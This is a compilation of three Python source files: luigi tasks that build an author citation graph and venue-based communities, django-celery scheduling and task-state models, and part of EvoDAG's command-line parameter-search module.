    def get_paper_edges(self, refg, paper_id, author_id):
        """Return the author-to-author edges for one paper: `author_id`
        paired with every author of every paper adjacent to `paper_id`."""
        node = refg.vs[paper_id]
        neighbors = node.neighbors()
        author_lists = [n['author_ids'] for n in neighbors]
        if not author_lists:
            return []
        # Flatten with a comprehension: reduce() is not a builtin on
        # Python 3, and repeated list + was quadratic anyway.
        authors = [a for author_list in author_lists for a in author_list]
        return zip([author_id] * len(authors), authors)

    def run(self):
        nodes = self.read_author_ids()
        edges = self.get_edges()
        authorg = util.build_undirected_graph(nodes, edges)
        # Now write the graph to gzipped graphml file.
        graph_output_file, idmap_output_file = self.output()
        authorg.write_graphmlz(graph_output_file.path)
        # Finally, build and save the ID map.
        idmap = {v['name']: v.index for v in authorg.vs}
        rows = sorted(idmap.items())
        util.write_csv_to_fwrapper(
            idmap_output_file, ('author_id', 'node_id'), rows)
class WriteLCCAuthorCitationGraph(YearFilterableTask):
    """Extract the largest connected component (LCC) of the author citation
    graph and save it as graphml, edgelist, and an author-id map."""
    def requires(self):
        return BuildAuthorCitationGraph(self.start, self.end)

    @property
    def base_paths(self):
        return ('lcc-author-citation-graph.graphml.gz',
                'lcc-author-citation-graph.edgelist.txt',
                'lcc-author-id-to-node-id-map.csv')

    def run(self):
        graphml_out, edgelist_out, idmap_out = self.output()
        graph_file, _ = self.input()
        # Load the full author graph and keep only its giant component.
        full_graph = igraph.Graph.Read_GraphMLz(graph_file.path)
        giant = full_graph.components().giant()
        giant.write_graphmlz(graphml_out.path)
        giant.write_edgelist(edgelist_out.path)
        # Persist the author-id -> node-id assignment for the LCC.
        node_ids = {v['name']: v.index for v in giant.vs}
        util.write_csv_to_fwrapper(
            idmap_out, ('author_id', 'node_id'), sorted(node_ids.items()))
class AuthorCitationGraphLCCGraphml(YearFilterableTask):
    # Thin alias task exposing only the graphml output (first output) of
    # WriteLCCAuthorCitationGraph.
    def requires(self):
        return WriteLCCAuthorCitationGraph(self.start, self.end)
    def output(self):
        return self.input()[0]
class AuthorCitationGraphLCCIdmap(YearFilterableTask):
    # Thin alias task exposing only the id-map output (third output) of
    # WriteLCCAuthorCitationGraph.
    def requires(self):
        return WriteLCCAuthorCitationGraph(self.start, self.end)
    def output(self):
        return self.input()[2]
class AddVenuesToAuthorCitationGraph(YearFilterableTask):
    """Annotate each node of the LCC author citation graph with the ids of
    the venues that author has published at (the basis for the ground-truth
    communities)."""
    def requires(self):
        return (AuthorCitationGraphLCCGraphml(self.start, self.end),
                AuthorCitationGraphLCCIdmap(self.start, self.end),
                filtering.FilteredCSVPapers(self.start, self.end),
                filtering.FilterAuthorshipsToYearRange(self.start, self.end))

    @property
    def base_paths(self):
        return ('lcc-author-citation-graph.pickle.gz',
                'lcc-venue-id-map.csv')

    def build_linked_venue_frame(self):
        """Join the author and paper data records in order to map authors to
        venues; return a DataFrame of (author_id, venue) pairs restricted
        to authors present in the LCC."""
        _, idmap_file, paper_file, author_file = self.input()
        # Read in authorship and venue records, with common paper_id for join
        with author_file.open() as author_fd, paper_file.open() as paper_fd:
            author_df = pd.read_table(
                author_fd, sep=",", header=0,
                usecols=('author_id', 'paper_id'))
            paper_df = pd.read_table(
                paper_fd, sep=",", header=0,
                usecols=('id', 'venue'))
            paper_df.columns = ('paper_id', 'venue')
        # filter authors down to those in LCC
        with idmap_file.open() as author_fd:
            lcc_author_df = pd.read_csv(author_fd, header=0, usecols=(0,))
            lcc_author_ids = lcc_author_df['author_id'].values
        # Filter based on LCC author ids
        selection = author_df['author_id'].isin(lcc_author_ids)
        author_df = author_df[selection]
        merge_df = author_df.merge(paper_df)
        del merge_df['paper_id']  # only need (author_id, venue) pairs
        return merge_df

    def assign_venue_ids(self, author_venue_df):
        """Assign each venue a stable integer id (sorted by venue name) and
        return the {venue: id} mapping.  Note: the mapping is persisted by
        run(), not here (the old docstring and unused output unpacking
        suggested otherwise)."""
        unique_venues = author_venue_df['venue'].unique()
        unique_venues.sort()
        venue_map = {venue: vnum for vnum, venue in enumerate(unique_venues)}
        return venue_map

    def run(self):
        graph_file, idmap_file, paper_file, author_file = self.input()
        # Read in dependencies
        lcc = igraph.Graph.Read_GraphMLz(graph_file.path)
        author_venue_df = self.build_linked_venue_frame()
        venue_map = self.assign_venue_ids(author_venue_df)
        records = util.iter_csv_fwrapper(idmap_file)
        lcc_idmap = {record[0]: int(record[1]) for record in records}
        # Use sets while accumulating in order to ensure uniqueness.
        for v in lcc.vs:
            v['venues'] = set()
        # Add the venue IDs to the node venue sets.
        for rownum, (author_id, venue) in author_venue_df.iterrows():
            node_id = lcc_idmap[str(author_id)]
            venue_id = venue_map[venue]
            lcc.vs[node_id]['venues'].add(venue_id)
        # Freeze the sets as tuples before serializing.
        for v in lcc.vs:
            v['venues'] = tuple(v['venues'])
        # save a copy of the graph with venue info
        pickle_outfile, venue_map_outfile = self.output()
        lcc.write_picklez(pickle_outfile.path)
        # items() rather than iteritems(): identical on Python 2, and also
        # valid on Python 3.
        rows = ((vnum, venue) for venue, vnum in venue_map.items())
        util.write_csv_to_fwrapper(
            venue_map_outfile, ('venue_id', 'venue_name'), rows)
class BuildGroundTruthCommunities(YearFilterableTask):
    """Build ground truth communities from the graph using the venue id
    mapping.
    """
    def requires(self):
        return AddVenuesToAuthorCitationGraph(self.start, self.end)

    @property
    def base_paths(self):
        return ('lcc-ground-truth-by-venue.txt',
                'lcc-author-venues.txt')

    def run(self):
        pickle_file, venue_map_file = self.input()
        graph = igraph.Graph.Read_Picklez(pickle_file.path)
        # One (initially empty) member list per known venue id.
        venue_rows = util.iter_csv_fwrapper(venue_map_file)
        communities = {int(vid): [] for vid, _ in venue_rows}
        # Each node joins the community of every venue it appears at.
        for vertex in graph.vs:
            for vid in vertex['venues']:
                communities[vid].append(vertex.index)
        by_venue_file, by_author_file = self.output()
        # One line per venue id (ascending): its community's node ids.
        member_lines = (' '.join(map(str, members))
                        for _, members in sorted(communities.items()))
        with by_venue_file.open('w') as f:
            f.write('\n'.join(member_lines))
        # One line per node (node-id order): that author's venue ids.
        node_venues = sorted([(v.index, v['venues']) for v in graph.vs])
        venue_lines = (' '.join(map(str, venues))
                       for _, venues in node_venues)
        with by_author_file.open('w') as f:
            f.write('\n'.join(venue_lines))
class BuildAllGraphData(luigi.Task):
    """Build all the graph data with one single task."""
    # Year-range bounds passed down to every dependent task.
    start = luigi.IntParameter(default=None)
    end = luigi.IntParameter(default=None)
    def requires(self):
        # The ground-truth task transitively requires every other
        # graph-building task in this module.
        yield BuildGroundTruthCommunities(self.start, self.end)
if __name__ == "__main__":
    # Hand control to luigi's command-line interface.
    luigi.run()
| |
from __future__ import absolute_import, unicode_literals
from datetime import timedelta, datetime
from time import time, mktime, gmtime
from django.core.exceptions import MultipleObjectsReturned, ValidationError
from django.db import models
from django.db.models import signals
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from celery import schedules
from celery import states
from celery.events.state import heartbeat_expires
from . import managers
from .picklefield import PickledObjectField
from .utils import fromtimestamp, now
from .compat import python_2_unicode_compatible
# All celery task states, sorted for a stable choice ordering.
ALL_STATES = sorted(states.ALL_STATES)
# Wrap in list(): on Python 3 a bare zip() is a one-shot iterator, so the
# field choices would be exhausted after the first iteration.  On Python 2
# list(zip(...)) is identical to zip(...).
TASK_STATE_CHOICES = list(zip(ALL_STATES, ALL_STATES))
@python_2_unicode_compatible
class TaskMeta(models.Model):
    """Task result/status."""
    # Celery task UUID; one row per task result.
    task_id = models.CharField(_('task id'), max_length=255, unique=True)
    status = models.CharField(
        _('state'),
        max_length=50, default=states.PENDING, choices=TASK_STATE_CHOICES,
    )
    # Pickled return value (or exception) of the task.
    result = PickledObjectField(null=True, default=None, editable=False)
    date_done = models.DateTimeField(_('done at'), auto_now=True)
    traceback = models.TextField(_('traceback'), blank=True, null=True)
    # NOTE(review): presumably filtered out by TaskManager's default
    # queries — confirm in managers.py.
    hidden = models.BooleanField(editable=False, default=False, db_index=True)
    # TODO compression was enabled by mistake, we need to disable it
    # but this is a backwards incompatible change that needs planning.
    meta = PickledObjectField(
        compress=True, null=True, default=None, editable=False,
    )

    objects = managers.TaskManager()

    class Meta:
        verbose_name = _('task state')
        verbose_name_plural = _('task states')
        db_table = 'celery_taskmeta'

    def to_dict(self):
        """Return a plain-dict view of this result row; 'children' is pulled
        out of the pickled meta field (empty dict when meta is unset)."""
        return {'task_id': self.task_id,
                'status': self.status,
                'result': self.result,
                'date_done': self.date_done,
                'traceback': self.traceback,
                'children': (self.meta or {}).get('children')}

    def __str__(self):
        return '<Task: {0.task_id} state={0.status}>'.format(self)
@python_2_unicode_compatible
class TaskSetMeta(models.Model):
    """TaskSet (group) result."""
    # Celery group UUID; one row per stored group result.
    taskset_id = models.CharField(_('group id'), max_length=255, unique=True)
    result = PickledObjectField()
    date_done = models.DateTimeField(_('created at'), auto_now=True)
    # NOTE(review): presumably filtered out by TaskSetManager's default
    # queries — confirm in managers.py.
    hidden = models.BooleanField(editable=False, default=False, db_index=True)

    objects = managers.TaskSetManager()

    class Meta:
        """Model meta-data."""
        verbose_name = _('saved group result')
        verbose_name_plural = _('saved group results')
        db_table = 'celery_tasksetmeta'

    def to_dict(self):
        """Return a plain-dict view of this group result row."""
        return {'taskset_id': self.taskset_id,
                'result': self.result,
                'date_done': self.date_done}

    def __str__(self):
        return '<TaskSet: {0.taskset_id}>'.format(self)
# Interval period choices: (stored value, localized label).  The stored
# values double as timedelta keyword arguments in IntervalSchedule.schedule.
PERIOD_CHOICES = (('days', _('Days')),
                  ('hours', _('Hours')),
                  ('minutes', _('Minutes')),
                  ('seconds', _('Seconds')),
                  ('microseconds', _('Microseconds')))
@python_2_unicode_compatible
class IntervalSchedule(models.Model):
    """A schedule that fires every `every` `period` (e.g. every 10 seconds)."""
    every = models.IntegerField(_('every'), null=False)
    period = models.CharField(
        _('period'), max_length=24, choices=PERIOD_CHOICES,
    )

    class Meta:
        verbose_name = _('interval')
        verbose_name_plural = _('intervals')
        ordering = ['period', 'every']

    @property
    def schedule(self):
        # The period value doubles as a timedelta keyword argument.
        return schedules.schedule(timedelta(**{self.period: self.every}))

    @classmethod
    def from_schedule(cls, schedule, period='seconds'):
        """Return the model row matching a celery schedule, or a new
        *unsaved* instance when none exists."""
        # Clamp to zero; a negative interval makes no sense here.
        every = max(schedule.run_every.total_seconds(), 0)
        try:
            return cls.objects.get(every=every, period=period)
        except cls.DoesNotExist:
            return cls(every=every, period=period)
        except MultipleObjectsReturned:
            # Duplicate rows: drop them all and start over with a fresh
            # (unsaved) instance.
            cls.objects.filter(every=every, period=period).delete()
            return cls(every=every, period=period)

    def __str__(self):
        if self.every == 1:
            return _('every {0.period_singular}').format(self)
        return _('every {0.every} {0.period}').format(self)

    @property
    def period_singular(self):
        # 'days' -> 'day', etc.; every PERIOD_CHOICES value ends in 's'.
        return self.period[:-1]
@python_2_unicode_compatible
class CrontabSchedule(models.Model):
    """Crontab-style schedule; each field stores a crontab pattern string,
    defaulting to '*' (match everything)."""
    minute = models.CharField(_('minute'), max_length=64, default='*')
    hour = models.CharField(_('hour'), max_length=64, default='*')
    day_of_week = models.CharField(
        _('day of week'), max_length=64, default='*',
    )
    day_of_month = models.CharField(
        _('day of month'), max_length=64, default='*',
    )
    month_of_year = models.CharField(
        _('month of year'), max_length=64, default='*',
    )

    class Meta:
        verbose_name = _('crontab')
        verbose_name_plural = _('crontabs')
        ordering = ['month_of_year', 'day_of_month',
                    'day_of_week', 'hour', 'minute']

    def __str__(self):
        # Render like a crontab line; empty/None fields display as '*'.
        rfield = lambda f: f and str(f).replace(' ', '') or '*'
        return '{0} {1} {2} {3} {4} (m/h/d/dM/MY)'.format(
            rfield(self.minute), rfield(self.hour), rfield(self.day_of_week),
            rfield(self.day_of_month), rfield(self.month_of_year),
        )

    @property
    def schedule(self):
        # Adapt the stored pattern strings into a celery crontab schedule.
        return schedules.crontab(minute=self.minute,
                                 hour=self.hour,
                                 day_of_week=self.day_of_week,
                                 day_of_month=self.day_of_month,
                                 month_of_year=self.month_of_year)

    @classmethod
    def from_schedule(cls, schedule):
        """Return the model row matching a celery crontab schedule, or a new
        *unsaved* instance when none exists."""
        spec = {'minute': schedule._orig_minute,
                'hour': schedule._orig_hour,
                'day_of_week': schedule._orig_day_of_week,
                'day_of_month': schedule._orig_day_of_month,
                'month_of_year': schedule._orig_month_of_year}
        try:
            return cls.objects.get(**spec)
        except cls.DoesNotExist:
            return cls(**spec)
        except MultipleObjectsReturned:
            # Duplicate rows: drop them all and return a fresh unsaved row.
            cls.objects.filter(**spec).delete()
            return cls(**spec)
class PeriodicTasks(models.Model):
    """Single-row table (ident is always 1) recording when any periodic task
    definition last changed, so schedulers can detect updates."""
    ident = models.SmallIntegerField(default=1, primary_key=True, unique=True)
    last_update = models.DateTimeField(null=False)

    objects = managers.ExtendedManager()

    @classmethod
    def changed(cls, instance, **kwargs):
        # Signal-handler-style hook: bump last_update unless the saved
        # instance opted out via its no_changes flag.
        if not instance.no_changes:
            cls.objects.update_or_create(ident=1,
                                         defaults={'last_update': now()})

    @classmethod
    def last_change(cls):
        # Implicitly returns None when no change was ever recorded.
        try:
            return cls.objects.get(ident=1).last_update
        except cls.DoesNotExist:
            pass
@python_2_unicode_compatible
class PeriodicTask(models.Model):
    """A task to be run periodically on either an interval or crontab schedule."""
    name = models.CharField(
        _('name'), max_length=200, unique=True,
        help_text=_('Useful description'),
    )
    task = models.CharField(_('task name'), max_length=200)
    # Exactly one of `interval` / `crontab` must be set (see validate_unique).
    interval = models.ForeignKey(
        IntervalSchedule,
        null=True, blank=True, verbose_name=_('interval'),
    )
    crontab = models.ForeignKey(
        CrontabSchedule, null=True, blank=True, verbose_name=_('crontab'),
        help_text=_('Use one of interval/crontab'),
    )
    args = models.TextField(
        _('Arguments'), blank=True, default='[]',
        help_text=_('JSON encoded positional arguments'),
    )
    kwargs = models.TextField(
        _('Keyword arguments'), blank=True, default='{}',
        help_text=_('JSON encoded keyword arguments'),
    )
    queue = models.CharField(
        _('queue'), max_length=200, blank=True, null=True, default=None,
        help_text=_('Queue defined in CELERY_QUEUES'),
    )
    exchange = models.CharField(
        _('exchange'), max_length=200, blank=True, null=True, default=None,
    )
    routing_key = models.CharField(
        _('routing key'), max_length=200, blank=True, null=True, default=None,
    )
    expires = models.DateTimeField(
        _('expires'), blank=True, null=True,
    )
    enabled = models.BooleanField(
        _('enabled'), default=True,
    )
    last_run_at = models.DateTimeField(
        auto_now=False, auto_now_add=False,
        editable=False, blank=True, null=True,
    )
    total_run_count = models.PositiveIntegerField(
        default=0, editable=False,
    )
    date_changed = models.DateTimeField(auto_now=True)
    description = models.TextField(_('description'), blank=True)
    objects = managers.PeriodicTaskManager()
    # When True, saving does not bump PeriodicTasks.last_update (see changed()).
    no_changes = False
    class Meta:
        verbose_name = _('periodic task')
        verbose_name_plural = _('periodic tasks')
    def validate_unique(self, *args, **kwargs):
        """Also enforce that exactly one of interval/crontab is set."""
        super(PeriodicTask, self).validate_unique(*args, **kwargs)
        if not self.interval and not self.crontab:
            raise ValidationError(
                {'interval': ['One of interval or crontab must be set.']})
        if self.interval and self.crontab:
            raise ValidationError(
                {'crontab': ['Only one of interval or crontab must be set']})
    def save(self, *args, **kwargs):
        # Normalize empty strings to NULL so routing falls back to defaults.
        self.exchange = self.exchange or None
        self.routing_key = self.routing_key or None
        self.queue = self.queue or None
        # A disabled task forgets its last run so re-enabling starts fresh.
        if not self.enabled:
            self.last_run_at = None
        super(PeriodicTask, self).save(*args, **kwargs)
    def __str__(self):
        # crontab wins over interval if both are set (validation forbids that).
        fmt = '{0.name}: {{no schedule}}'
        if self.interval:
            fmt = '{0.name}: {0.interval}'
        if self.crontab:
            fmt = '{0.name}: {0.crontab}'
        return fmt.format(self)
    @property
    def schedule(self):
        """Return the celery schedule object for whichever schedule is set."""
        if self.interval:
            return self.interval.schedule
        if self.crontab:
            return self.crontab.schedule
# Keep PeriodicTasks.last_update in sync whenever a PeriodicTask is
# saved or deleted, so schedulers know to reload their schedule.
signals.pre_delete.connect(PeriodicTasks.changed, sender=PeriodicTask)
signals.pre_save.connect(PeriodicTasks.changed, sender=PeriodicTask)
class WorkerState(models.Model):
    """Monitoring state of a single celery worker, keyed by hostname."""
    hostname = models.CharField(_('hostname'), max_length=255, unique=True)
    last_heartbeat = models.DateTimeField(_('last heartbeat'), null=True,
                                          db_index=True)
    objects = managers.ExtendedManager()
    class Meta:
        """Model meta-data."""
        verbose_name = _('worker')
        verbose_name_plural = _('workers')
        get_latest_by = 'last_heartbeat'
        ordering = ['-last_heartbeat']
    def __str__(self):
        return self.hostname
    def __repr__(self):
        return '<WorkerState: {0.hostname}>'.format(self)
    def is_alive(self):
        """Return True if the last heartbeat has not yet expired."""
        if self.last_heartbeat:
            # Use UTC timestamp if USE_TZ is true, or else use local timestamp
            timestamp = mktime(gmtime()) if settings.USE_TZ else time()
            return timestamp < heartbeat_expires(self.heartbeat_timestamp)
        return False
    @property
    def heartbeat_timestamp(self):
        # Seconds-resolution POSIX timestamp of the last heartbeat.
        return mktime(self.last_heartbeat.timetuple())
@python_2_unicode_compatible
class TaskState(models.Model):
    """Snapshot of a single celery task execution, built from task events."""
    state = models.CharField(
        _('state'), max_length=64, choices=TASK_STATE_CHOICES, db_index=True,
    )
    task_id = models.CharField(_('UUID'), max_length=36, unique=True)
    name = models.CharField(
        _('name'), max_length=200, null=True, db_index=True,
    )
    tstamp = models.DateTimeField(_('event received at'), db_index=True)
    args = models.TextField(_('Arguments'), null=True)
    kwargs = models.TextField(_('Keyword arguments'), null=True)
    eta = models.DateTimeField(_('ETA'), null=True)
    expires = models.DateTimeField(_('expires'), null=True)
    result = models.TextField(_('result'), null=True)
    traceback = models.TextField(_('traceback'), null=True)
    runtime = models.FloatField(
        _('execution time'), null=True,
        help_text=_('in seconds if task succeeded'),
    )
    retries = models.IntegerField(_('number of retries'), default=0)
    worker = models.ForeignKey(
        WorkerState, null=True, verbose_name=_('worker'),
    )
    hidden = models.BooleanField(editable=False, default=False, db_index=True)
    objects = managers.TaskStateManager()
    class Meta:
        """Model meta-data."""
        verbose_name = _('task')
        verbose_name_plural = _('tasks')
        get_latest_by = 'tstamp'
        ordering = ['-tstamp']
    def save(self, *args, **kwargs):
        # Round-trip eta/expires through a POSIX timestamp, preserving
        # microseconds via the '%d.%s' string; this drops tzinfo.
        # NOTE(review): with USE_TZ this mixes naive/aware datetimes — confirm.
        if self.eta is not None:
            self.eta = fromtimestamp(float('%d.%s' % (
                mktime(self.eta.timetuple()), self.eta.microsecond,
            )))
        if self.expires is not None:
            self.expires = fromtimestamp(float('%d.%s' % (
                mktime(self.expires.timetuple()), self.expires.microsecond,
            )))
        super(TaskState, self).save(*args, **kwargs)
    def __str__(self):
        name = self.name or 'UNKNOWN'
        s = '{0.state:<10} {0.task_id:<36} {1}'.format(self, name)
        if self.eta:
            s += ' eta:{0.eta}'.format(self)
        return s
    def __repr__(self):
        return '<TaskState: {0.state} {1}[{0.task_id}] ts:{0.tstamp}>'.format(
            self, self.name or 'UNKNOWN',
        )
| |
# Copyright 2016 Mario Graff Guerrero
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import numpy as np
from .utils import RandomParameterSearch, PARAMS
from SparseArray import SparseArray
from .model import Ensemble, EvoDAG as model_EvoDAG, EvoDAGE
import collections
import os
from multiprocessing import Pool
import EvoDAG as evodag
from EvoDAG import EvoDAG
from .utils import tonparray
from .utils import Inputs
import time
import gzip
import json
import logging
import gc
import pickle
# Location of the JSON file with the default parameter space.
DEFAULT_PARAMETERS = os.path.join(os.path.dirname(__file__),
                                  'conf', 'default_parameters.json')
# tqdm is optional: fall back to an identity wrapper (no progress bar).
try:
    from tqdm import tqdm
except ImportError:
    def tqdm(x, **kwargs):
        return x
def init_evodag(seed_args_X_y_test):
    """Fit one EvoDAG for a given seed and return its model.

    The single argument is a tuple ``(seed, params, X, y, test, dirname)``.
    When *dirname* is given, the fitted model is cached on disk as
    ``<dirname>/<seed>.evodag`` and reused on later calls.
    """
    seed, params, train_X, train_y, test_set, dirname = seed_args_X_y_test
    cache_path = None
    if dirname is not None:
        cache_path = os.path.join(dirname, '%s.evodag' % seed)
        if os.path.isfile(cache_path):
            # Best effort: a corrupt cache entry simply triggers a refit.
            with gzip.open(cache_path) as fpt:
                try:
                    return pickle.load(fpt)
                except Exception:
                    pass
    evo = EvoDAG(seed=seed, **params).fit(train_X, train_y, test_set=test_set)
    model = evo.model()
    gc.collect()
    if cache_path is not None:
        with gzip.open(cache_path, 'w') as fpt:
            pickle.dump(model, fpt)
    return model
def rs_evodag(args_X_y):
    """Evaluate one parameter configuration over three seeds.

    Returns ``(fitness_list, args)`` where *args* gains a ``_time`` key with
    the elapsed wall-clock seconds.  A failed run contributes ``-inf``.
    """
    params, X, y = args_X_y
    started = time.time()
    fitness = []
    for seed in range(3):
        try:
            evo = EvoDAG(seed=seed,
                         **RandomParameterSearch.process_params(params)).fit(X, y)
            fitness.append(evo.model().fitness_vs)
        except RuntimeError:
            fitness.append(-np.inf)
    params['_time'] = time.time() - started
    gc.collect()
    return fitness, params
def get_model_fitness(fname):
    """Load the pickled model stored gzip-compressed in *fname*.

    Returns the tuple ``(fname, fitness_vs)``.
    """
    with gzip.open(fname) as fpt:
        model = pickle.load(fpt)
    return (fname, model.fitness_vs)
class CommandLine(object):
    """Base class for the EvoDAG command-line entry points.

    Subclasses build ``self.parser`` (argparse) from the small helper
    methods below, then call :meth:`parse_args`, which stores the parsed
    namespace in ``self.data`` and dispatches to :meth:`main`.
    """
    def version(self):
        """Add --version and --verbose flags."""
        pa = self.parser.add_argument
        pa('--version',
           action='version', version='EvoDAG %s' % evodag.__version__)
        pa('--verbose', dest='verbose', default=logging.NOTSET, type=int)
    def output_file(self):
        """Add -o/--output-file (where predictions are written)."""
        self.parser.add_argument('-o', '--output-file',
                                 help='File to store the test set',
                                 dest='output_file',
                                 default=None,
                                 type=str)
    def ensemble(self):
        """Add -n/--ensemble-size (default 30)."""
        self.parser.add_argument('-n', '--ensemble-size',
                                 help='Ensemble size',
                                 dest='ensemble_size',
                                 default=30,
                                 type=int)
    def cores(self):
        """Add -u/--cpu-cores (default 1)."""
        self.parser.add_argument('-u', '--cpu-cores',
                                 help='Number of cores',
                                 dest='cpu_cores',
                                 default=1,
                                 type=int)
    def test_set(self):
        """Add -t/--test_set (optional csv file)."""
        cdn = 'File containing the test set on csv.'
        self.parser.add_argument('-t', '--test_set',
                                 default=None, type=str,
                                 help=cdn)
    def init_params(self):
        """Add task-type (-C/-R) and core evolution parameters."""
        pa = self.parser.add_argument
        g = self.parser.add_mutually_exclusive_group(required=True)
        g.add_argument('-C', '--classifier', dest='classifier',
                       help='The task is classification (default)',
                       default=True,
                       action="store_true")
        g.add_argument('-R', '--regressor', dest='regressor',
                       help='The task is regression',
                       action="store_true")
        pa('-e', '--early_stopping_rounds', dest='early_stopping_rounds',
           type=int,
           help='Early stopping rounds')
        pa('-p', '--popsize', dest='popsize',
           type=int, help='Population size')
        pa('-s', '--seed', dest='seed',
           default=0,
           type=int, help='Seed')
        pa('-j', '--json', dest='json',
           action="store_true",
           help='Whether the inputs are in json format',
           default=False)
        pa('--time-limit', dest='time_limit',
           help='Time limit in seconds', type=int)
    def training_set(self):
        """Add the positional (optional) training-set argument."""
        cdn = 'File containing the training set on csv.'
        self.parser.add_argument('training_set',
                                 nargs='?',
                                 default=None,
                                 help=cdn)
    def parse_args(self):
        """Parse sys.argv, configure logging, then run :meth:`main`."""
        self.data = self.parser.parse_args()
        # -R overrides the default classifier flag.
        if hasattr(self.data, 'regressor') and self.data.regressor:
            self.data.classifier = False
        if hasattr(self.data, 'verbose'):
            logging.basicConfig()
            logger = logging.getLogger('EvoDAG')
            logger.setLevel(self.data.verbose)
            logger.info('Logging to: %s', self.data.verbose)
        self.main()
    def read_training_set(self):
        """Load self.X / self.y; returns True on success, None if no file."""
        if self.data.training_set is None:
            return
        if not self.data.json:
            self.X, self.y = self.inputs.read_csv(self.data.training_set, self.data.output_dim)
            return True
        else:
            self.X, self.y = self.inputs.read_data_json(self.data.training_set)
            return True
    def read_test_set(self):
        """Load self.Xtest; returns False if no test set was given."""
        if self.data.test_set is None:
            return False
        if not self.data.json:
            self.Xtest, _ = self.inputs.read_csv(self.data.test_set, 0)
            return True
        else:
            self.Xtest, _ = self.inputs.read_data_json(self.data.test_set)
            return True
    def get_model_file(self):
        """Return the model file name, deriving it from the training set."""
        # NOTE(review): split('.')[0] truncates at the FIRST dot, so
        # 'data.train.csv' becomes 'data.evodag.gz' — confirm intended.
        if self.data.model_file is None:
            a = self.data.training_set.split('.')[0]
            self.data.model_file = a + '.evodag.gz'
        return self.data.model_file
    def get_output_file(self):
        """Return the output file name, deriving it from the test set."""
        if self.data.output_file is None:
            self.data.output_file = self.data.test_set + '.evodag.csv'
            # if self.data.json:
            #     self.data.output_file += '.json'
            # else:
            #     self.data.output_file += '.csv'
        return self.data.output_file
    def id2label(self, x):
        """Map numeric class ids back to the original labels (classification)."""
        if not self.data.classifier:
            return x
        if len(self.label2id) == 0:
            return x
        # Invert label -> id into id -> label.
        i2w = dict([(i[1], i[0]) for i in self.label2id.items()])
        return [i2w[int(i)] for i in x]
    def main(self):
        """Hook overridden by subclasses; called from parse_args."""
        pass
class CommandLineParams(CommandLine):
    """`EvoDAG-params`: random search over the hyper-parameter space."""
    def __init__(self):
        self.Xtest = None
        self.inputs = Inputs()
        self.word2id = self.inputs.word2id
        self.label2id = self.inputs.label2id
        self.parser = argparse.ArgumentParser(description="EvoDAG")
        self.training_set()
        self.init_params()
        self.optimize_parameters()
        self.cores()
        self.version()
    def optimize_parameters(self):
        """Add the parameter-search specific command-line flags."""
        cdn = '''Optimize parameters sampling
        N (734 by default) points from the parameter space'''
        self.parser.add_argument('-r', '--optimize-parameters',
                                 dest='optimize_parameters',
                                 default=734,
                                 type=int, help=cdn)
        cdn = 'File to store the fitness of the parameters explored'
        self.parser.add_argument('-P', '--parameters',
                                 dest='parameters',
                                 type=str,
                                 help=cdn)
        cdn = 'File containing the parameters values (json) to be explored'
        self.parser.add_argument('--parameters-values',
                                 dest='parameters_values',
                                 type=str,
                                 help=cdn)
        self.parser.add_argument('--output-dim',
                                 dest='output_dim',
                                 default=1,
                                 type=int,
                                 help="Output Dimension (default 1) use with multiple-outputs flag")
        self.parser.add_argument('--only-paramsfiles',
                                 help='Save the params to disk creating a directory',
                                 dest='do_nothing',
                                 action="store_true",
                                 default=False)
    def fs_type_constraint(self, params):
        """Drop function-set entries not supported by the current task type."""
        fs_class = {}
        for x in EvoDAG()._function_set:
            fs_class[x.__name__] = x
        p_delete = []
        for x in params.keys():
            if x in fs_class:
                try:
                    if self.data.classifier:
                        flag = fs_class[x].classification
                    else:
                        flag = fs_class[x].regression
                    if not flag:
                        p_delete.append(x)
                except AttributeError:
                    # Functions without a task flag are kept.
                    pass
        for x in p_delete:
            del params[x]
    def if_type_contraint(self, params):
        """Filter 'input_functions' to those valid for the task, deduplicated."""
        import importlib
        unique = {}
        if 'input_functions' not in params:
            return
        input_functions = params['input_functions']
        R = []
        for inner in input_functions:
            r = []
            for f in inner:
                _ = importlib.import_module('EvoDAG.node')
                j = getattr(_, f)
                if self.data.classifier:
                    flag = j.classification
                else:
                    flag = j.regression
                if flag:
                    r.append(f)
            if len(r):
                # Deduplicate identical function lists.
                key = ';'.join(r)
                if key not in unique:
                    R.append(r)
                    unique[key] = 1
        if len(R) == 1:
            R = R[0]
        params['input_functions'] = R
    def evolve(self, kw):
        """Run the random parameter search and write the sorted results.

        *kw* holds command-line overrides pinning a parameter to one value.
        """
        if self.data.parameters_values:
            with open(self.data.parameters_values, 'r') as fpt:
                params = json.loads(fpt.read())
        else:
            params = PARAMS.copy()
            if len(kw):
                for k, v in kw.items():
                    if k in params and v is not None:
                        params[k] = [v]
        self.fs_type_constraint(params)
        self.if_type_contraint(params)
        parameters = self.data.parameters
        if parameters is None:
            parameters = self.data.training_set + '.EvoDAGparams'
        npoints = self.data.optimize_parameters
        if isinstance(self.X, list):
            training_size = self.X[0].size()
        else:
            training_size = self.X.shape[0]
        rs = RandomParameterSearch(params=params,
                                   seed=self.data.seed,
                                   training_size=training_size,
                                   npoints=npoints)
        if self.data.do_nothing:
            # --only-paramsfiles: dump each configuration to its own file.
            os.mkdir(parameters)
            for k, x in enumerate(rs):
                fname = os.path.join(parameters, '%s_params.json' % k)
                with open(fname, 'w') as fpt:
                    fpt.write(json.dumps(x, sort_keys=True, indent=2))
            return
        if self.data.cpu_cores == 1:
            res = [rs_evodag((args, self.X, self.y))
                   for args in tqdm(rs, total=rs._npoints)]
        else:
            p = Pool(self.data.cpu_cores, maxtasksperchild=1)
            args = [(args, self.X, self.y) for args in rs]
            res = [x for x in tqdm(p.imap_unordered(rs_evodag, args),
                                   total=len(args))]
            p.close()
        # Fold the fitness list into each configuration and sort best-first.
        [x[1].update(dict(fitness=x[0])) for x in res]
        res = [x[1] for x in res]
        [x.update(kw) for x in res]
        res.sort(key=lambda x: np.median(x['fitness']), reverse=True)
        res = json.dumps(res, sort_keys=True, indent=2)
        if parameters.endswith('.gz'):
            with gzip.open(parameters, 'wb') as fpt:
                # py2/py3 compatibility for writing text to a binary stream.
                try:
                    fpt.write(bytes(res, encoding='utf-8'))
                except TypeError:
                    fpt.write(res)
